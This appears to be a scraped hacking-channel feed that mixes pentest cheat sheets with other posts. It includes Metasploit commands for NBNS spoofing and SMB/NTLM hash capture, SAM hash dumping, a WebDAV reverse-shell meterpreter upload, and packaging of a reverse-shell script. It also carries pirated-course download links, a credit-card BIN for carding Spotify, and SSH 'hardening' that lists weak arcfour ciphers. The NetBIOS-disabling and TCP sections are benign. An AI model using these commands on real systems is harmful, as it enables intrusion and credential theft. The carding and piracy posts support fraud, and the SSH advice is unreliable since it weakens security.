🦑Basic Head Construction with Bryan Lee —338 MB—

https://gumroad.com/foundation_patreon?query=head&sort=newest#qPnmAN

https://mega.nz/#F!Y5xCQCqI!avrNngCf9kayTrNW0_0Nrw

ALL IN 1 ABOUT 300 TB Courses :

https://drive.google.com/drive/folders/1oCMgJeBc55NuEasPcgwjx2FuPdQd8neu

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑NBNS Spoof / Capture

[>] NBNS Spoof
msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > show options
msf auxiliary(nbns_response) > set INTERFACE eth0
msf auxiliary(nbns_response) > set SPOOFIP 10.10.10.10
msf auxiliary(nbns_response) > run

[>] SMB Capture

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb
msf auxiliary(smb) > run

[>] HTTP NTML Capture

msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm
msf auxiliary(smb) > set JOHNPWFILE /tmp/john_http
msf auxiliary(smb) > set SRVPORT 80
msf auxiliary(smb) > set URIPATH /
msf auxiliary(smb) > run


Fix:
http://www.leonteale.co.uk/netbios-nbns-spoofing/

🦑Solution
The solution to this is to disable Netbios from broadcasting. The setting for this is in, what i hope, a very familiar place thaet you might not have really paid attention too before.
netbios

> Netbios, according to Microsoft, is no longer needed as of Windows 2000.

However, there are a few side effects.
One of the unexpected consequences of disabling Netbios completely on your network is how this affects trusts between forests. Windows 2000 let you create an external (non-transitive) trust between a domain in one forest and a domain in a different forest so users in one forest could access resources in the trusting domain of the other forest. Windows Server 2003 takes this a step further by allowing you to create a new type of two-way transitive trusts called forest trusts that allow users in any domain of one forest access resources in any domain of the other forest. Amazingly, NetBIOS is actually still used in the trust creation process, even though Microsoft has officially “deprecated” NetBIOS in versions of Windows from 2000 on. So if you disable Netbios on your domain controllers, you won’t be able to establish a forest trust between two Windows Server 2003 forests.
But Windows 2003 is pretty old, since as of writing we are generally on Windows 2012 now. So if you would like to disable Netbios on your servers yet will be effected by the side effect for Forest trusts then ideally you should upgrade and keep up with the times anyway. alternatively, you can get away with, at the very least, disabling Netbios on your workstations.
See below for step by step instructions on disabling Netbios on workstations:

🦑Windows XP, Windows Server 2003, and Windows 2000
On the desktop, right-click My Network Places, and then click Properties.
Right-click Local Area Connection, and then click Properties
In the Components checked are used by this connection list, double-click Internet Protocol (TCP/IP), clickAdvanced, and then click the WINS tab.Note In Windows XP and in Windows Server 2003, you must double-click Internet Protocol (TCP/IP) in the This connection uses the following items list.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.

🦑For Windows Vista
On the desktop, right-click Network, and then click Properties.
Under Tasks, click Manage network connections.
Right-click Local Area Connection, and then click Properties
In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.

🦑For Windows 7--8-10
Click Start, and then click Control Panel.
Under Network and Internet, click View network status and tasks.
Click Change adapter settings.
Right-click Local Area Connection, and then click Properties.
In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.

enjoy❤️👍🏻
✅topic git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑[+] Weak SSH Ciphers

sudo nano /etc/ssh/sshd_config

Add the following lines:

Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour
MACs hmac-sha1,hmac-ripemd160

> Restart SSH


[+] Unquoted Service Paths

Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services
Find the service in question and simply add " " either side of the ImagePath string.

Check permissions:
C:\Users\user>icacls "C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe"

✅topic git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Pyinstaller linux
#FastTips

python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py

+ Generate the .spec file.
+ Windows: (You want a single EXE file with your data in it, hence --onefile).

python pyinstaller.py --onefile yourmainfile.py

+ Rebuild your package.

python pyinstaller.py yourmainfile.spec

+Look for your .exe or your .app bundle in the dist directory.

#FastTips
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Pentesting tips :

Metasploit - spool /home/<username>/.msf3/logs/console.log
Save contents from each terminal!
Linux - script myoutput.txt # Type exit to stop

+ Disable network-manager
service network-manager stop

+ Set IP address
ifconfig eth0 192.168.50.12/24

+ Set default gateway
route add default gw 192.168.50.9

+ Set DNS servers
echo "nameserver 192.168.100.2" >> /etc/resolv.conf

+ Show routing table
Windows - route print
Linux - route -n

+ Add static route
Linux - route add -net 192.168.100.0/24 gw 192.16.50.9
Windows - route add 0.0.0.0 mask 0.0.0.0 192.168.50.9

+ Subnetting easy mode
ipcalc 192.168.0.1 255.255.255.0

+ Windows SAM file locations
c:\windows\system32\config\
c:\windows\repair\
bkhive system /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt

+ Python Shell
python -c 'import pty;pty.spawn("/bin/bash")'


✅topic git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Pentesting tips :

Metasploit - spool /home/<username>/.msf3/logs/console.log
Save contents from each terminal!
Linux - script myoutput.txt # Type exit to stop

+ Disable network-manager
service network-manager stop

+ Set IP address
ifconfig eth0 192.168.50.12/24

+ Set default gateway
route add default gw 192.168.50.9

+ Set DNS servers
echo "nameserver 192.168.100.2" >> /etc/resolv.conf

+ Show routing table
Windows - route print
Linux - route -n

+ Add static route
Linux - route add -net 192.168.100.0/24 gw 192.16.50.9
Windows - route add 0.0.0.0 mask 0.0.0.0 192.168.50.9

+ Subnetting easy mode
ipcalc 192.168.0.1 255.255.255.0

+ Windows SAM file locations
c:\windows\system32\config\
c:\windows\repair\
bkhive system /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt

+ Python Shell
python -c 'import pty;pty.spawn("/bin/bash")'


✅topic git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Internet Host/Network Enumeration

[+] WHOIS Querying
whois www.domain.com

[+] Resolve an IP using DIG
dig @8.8.8.8 securitymuppets.com

[+] Find Mail servers for a domain
dig @8.8.8.8 securitymuppets.com -t mx

[+] Find any DNS records for a domain
dig @8.8.8.8 securitymuppets.com -t any

[+] Zone Transfer
dig @192.168.100.2 securitymuppets.com -t axfr
host -l securitymuppets.com 192.168.100.2
nslookup / ls -d domain.com.local

[+] Fierce
fierce -dns <domain> -file <output_file>
fierce -dns <domain> -dnsserver <server>
fierce -range <ip-range> -dnsserver <server>
fierce -dns <domain> -wordlist <wordlist>


✅topic git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑IP Network scanning

[+] ARP Scan
arp-scan 192.168.50.8/28 -I eth0

[+] NMAP Scans

[+] Nmap ping scan
sudo nmap –sn -oA nmap_pingscan 192.168.100.0/24 (-PE)


[+] Nmap SYN/Top 100 ports Scan
nmap -sS -F -oA nmap_fastscan 192.168.0.1/24

[+] Nmap SYN/Version All port Scan - ## Main Scan
sudo nmap -sV -PN -p0- -T4 -A --stats-every 60s --reason -oA nmap_scan 192.168.0.1/24

[+] Nmap SYN/Version No Ping All port Scan
sudo nmap -sV -Pn -p0- --exclude 192.168.0.1 --reason -oA nmap_scan 192.168.0.1/24

[+] Nmap UDP All port scan - ## Main Scan
sudo nmap -sU -p0- --reason --stats-every 60s --max-rtt-timeout=50ms --max-retries=1 -oA nmap_scan 192.168.0.1/24

[+] Nmap UDP/Fast Scan
nmap -F -sU -oA nmap_UDPscan 192.168.0.1/24

[+] Nmap Top 1000 port UDP Scan
nmap -sU -oA nmap_UDPscan 192.168.0.1/24

[+] HPING3 Scans
hping3 -c 3 -s 53 -p 80 -S 192.168.0.1
Open = flags = SA
Closed = Flags = RA
Blocked = ICMP unreachable
Dropped = No response

[+] Source port scanning
nmap -g <port> (88 (Kerberos) port 53 (DNS) or 67 (DHCP))
Source port also doesn't work for OS detection.

[+] Speed settings
-n Disable DNS resolution
-sS TCP SYN (Stealth) Scan
-Pn Disable host discovery
-T5 Insane time template
--min-rate 1000 1000 packets per second
--max-retries 0 Disable retransmission of timed-out probes

[+] Netcat (swiss army knife)
# Connect mode (ncat is client) | default port is 31337
ncat <host> [<port>]

# Listen mode (ncat is server) | default port is 31337
ncat -l [<host>] [<port>]

# Transfer file (closes after one transfer)
ncat -l [<host>] [<port>] < file

# Transfer file (stays open for multiple transfers)
ncat -l --keep-open [<host>] [<port>] < file

# Receive file
ncat [<host>] [<port>] > file

# Brokering | allows for multiple clients to connect
ncat -l --broker [<host>] [<port>]

# Listen with SSL | many options, use ncat --help for full list
ncat -l --ssl [<host>] [<port>]

# Access control
ncat -l --allow <ip>
ncat -l --deny <ip>

# Proxying
ncat --proxy <proxyhost>[:<proxyport>] --proxy-type {http | socks4} <host>[<port>]

# Chat server | can use brokering for multi-user chat
ncat -l --chat [<host>] [<port>]


✅topic git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

exploit office 2016 any user !!

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Cisco/Networking Commands

? - Help
> - User mode
# - Privileged mode
router(config)# - Global Configuration mode

enable secret more secure than enable password.

For example, in the configuration command:
enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP.
The enable secret has been hashed with MD5, whereas in the command:
username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D
The password has been encrypted using the weak reversible algorithm.

enable - Change to privileged mode to view configs
config terminal/config t - Change to global config mode to modify

#show version - Gives you the router's configuration register (Firmware)
#show running-config - Shows the router, switch, or firewall's current configuration
#show ip route - show the router's routing table
#show tech-support - Dump config but obscure passwords

✅topic git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Remote Information Services

+ DNS
Zone Transfer - host -l securitymuppets.com 192.168.100.2
Metasploit Auxiliarys:
auxiliary/gather/enumdns
use auxiliary/gather/dns...

[+] Finger - Enumerate Users
finger @192.168.0.1
finger -l -p user@ip-address
auxiliary/scanner/finger/fingerusers

+ NTP
Metasploit Auxiliarys

+ SNMP
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt
Metasploit Module snmpenum
snmpcheck -t snmpservice

[+] rservices
rwho 192.168.0.1
rlogin -l root 192.168.0.17

[+] RPC Services
rpcinfo -p
Endpointmapper metasploit

✅topic git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Web Services

+ WebDAV
Metasploit Auxiliarys
Upload shell to Vulnerable WebDAV directory:
msfpayload windows/meterpreter/reversetcp LHOST=192.168.0.20 LPORT=4444 R | msfencode -t asp -o shell.asp
cadaver http://192.168.0.60/
put shell.asp shell.txt
copy shell.txt shell.asp;.txt
Start reverse handler - browse to http://192.168.0.60/shell.asp;.txt

[+] Nikto Web Scanner
# To scan a particular host
perl nikto.pl -host [host IP/name]

# To scan a host on multiple ports (default = 80)
perl nikto.pl -host [host IP/name] -port [port number 1], [port number 2], [port number 3]

# To scan a host and output fingerprinted information to a file
perl nikto.pl -host [host IP/name] -output [outputfile]

# To use a proxy while scanning a host
perl nikto.pl -host host IP/name -useproxy proxy address


✅topic git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Deploy Java Spring Apps Online to Amazon Cloud (AWS) —1.1 GB—

https://www.udemy.com/course/deploy-java-spring-apps-online/

https://mega.nz/#F!fTpiXabI!QpVEeba_0qFU_l1f3DXZAg

✅verified BIN SPOTIFY PREMIUM


BIN: 542418125639xxxx

DATE: 06/21
CVV: Generada
ZIP CODE: 10080
IP USA🇺🇸

(only verified by us )

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WHY WE SHOULD USE TCP CONNECTIONS ?

> What is 1 TCP connection
Before examining the structure of the TCP packet header, let’s figure out what 1 TCP connection is - this will help to more clearly understand what exactly we are analyzing in Wireshark and how many TCP connections we need to look for. For example, how many TCP connections are involved when opening 1 page of a website? A typical website consists of 1 page of HTML code, several pages of cascading style sheets for CSS and JavaScript files, as well as a couple of dozens of image files. So, to receive each of these files, a new TCP connection is created. For each of these connections, a three-stage handshake is performed - this is to the question of what costs, "overhead" TCP carries.

> That is, when you open the website page, the browser makes the first TCP connection and receives the source code of the web page. In this code, the browser finds links to files of styles, scripts, images - a new TCP connection is launched for each of these files.

> Therefore, when analyzing traffic in Wireshark when you open even one web page, you will see many started and completed TCP connections.

1️⃣Source port - bits 0-15. This is the packet source port. The source port was originally associated directly with the process in the sending system. Today, we use a hash between the IP addresses and the destination and source ports to achieve this uniqueness, which we can associate with a single application or program.

2️⃣Destination port - bits 16-31. This is the destination port of the TCP packet. As with the source port, it was initially directly connected to the process in the receiving system. Today, a hash is used instead, which allows us to have more open connections at the same time. When the packet is received, the destination and source ports return in response back to the original sending host, so that the destination port is now the source port and the source port is the destination port.

3️⃣The source port and destination port do not have to be the same: for example, if a request is made to the 80th port of the server, then this request may come, for example, from port 34054.

4️⃣The port numbers on the server can be used either standard or arbitrary.

5️⃣Sequence number - bits 32-63. The sequence number field is used to set the number in each TCP packet so that the TCP stream can be properly ordered (for example, packets are brought to the correct order). The serial number is then returned in the ACK field to confirm that the packet was received correctly.

Indicates the number of bytes transmitted, and each byte of payload transferred increases this value by 1.

6️⃣If the SYN flag is set (session is being established), then the field contains the initial serial number - ISN (Initial Sequence Number). For security purposes, this value is randomly generated and can be between 0 and 2 32 -1 (4294967295). The first byte of payload in the established session will be ISN + 1.

7️⃣Otherwise, if SYN is not set, the first byte of data transmitted in this packet has this serial number.

8️⃣Confirmation number (Acknowledgment Number (ACK SN)) - bits 64-95. This field is used when we acknowledge a specific packet received by the host. For example, we receive a packet with one established sequence number, and if everything is in order with the packet, we respond with an ACK packet with a confirmation number equal to the original sequence number.
If the ACK flag is set, this field contains the octet number that the sender of this segment wants to receive. This means that all previous octets (with numbers from ISN + 1 to ACK-1 inclusive) were successfully received.

9️⃣Each side calculates its own Sequence number for the transmitted data and separately Acknowledgment number for the received data. Accordingly, the Sequence number of each side corresponds to the Acknowledgment number of the other side.

🔟The length of the header (data offset) is bits 96-99. This field indicates the length of the TCP packet header and where the actual data begins (payload). The field is 4 bits in size and indicates the TCP header in 32-bit words. The header should always end with an even 32-bit border, even with various options set (options may not be available at all, or their number may vary). This is possible thanks to the Padding field at the very end of the TCP header.
1️⃣1️⃣The minimum header size is 5 words, and the maximum is 15 words, which gives a minimum size of 20 bytes and a maximum of 60 bytes, which allows you to use up to 40 bytes of options in the header. This field received this name (data offset) because it also shows the location of the actual data from the beginning of the TCP segment.

1️⃣2️⃣So, the length of the header determines the offset of the payload relative to the beginning of the segment. For example, a Data offset of 1111 indicates that the title occupies fifteen 32-bit words (15 lines * 32 bits in each line / 8 bits = 60 bytes).

🦑TCP Session
TCP handshake (establishing a TCP connection)

> TCP uses a three-step handshake to establish a connection.

1) Connection can be made only if the other side is listening on the port to which the connection will be made: for example, the web server is listening on ports 80 and 443. That is, this is not covered by a handshake, but before the client tries to connect to the server, the server must first connect to the port and start listening to it to open it for connections: this is called passive opening. Once a passive discovery is established, the client can initiate an active discovery. To establish a connection, a three-stage (or three-stage) handshake occurs:

2) The first stage, sending a packet with the SYN flag enabled : active opening is performed by the client sending SYN to the server. The client sets the sequence number of the segment to a random value A.

Note that by default, Wireshark shows the relative value of the sequence number (Sequence number), just below you can also see the real value (shown as raw ).